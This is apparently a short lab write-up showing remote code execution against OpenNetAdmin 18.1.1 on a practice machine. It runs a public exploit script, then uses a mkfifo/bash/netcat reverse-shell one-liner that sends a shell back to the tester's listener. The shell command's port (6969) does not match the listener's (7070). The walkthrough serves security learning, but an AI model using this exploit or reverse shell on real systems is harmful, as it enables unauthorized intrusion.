3 openNetAdmin 18.1.1

Using https://github.com/amriunix/ona-rce

$ python3 ona-rce.py check http://10.10.10.171/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] The remote host is vulnerable!


$ python3 ona-rce.py exploit http://10.10.10.171/ona/
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

sh$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.161 6969 >/tmp/f

$ rlwrap nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.171] 41088
bash: cannot set terminal process group (1026): Inappropriate ioctl for device
bash: no job control in this shell
www-data@openadmin:/opt/ona/www$

Last updated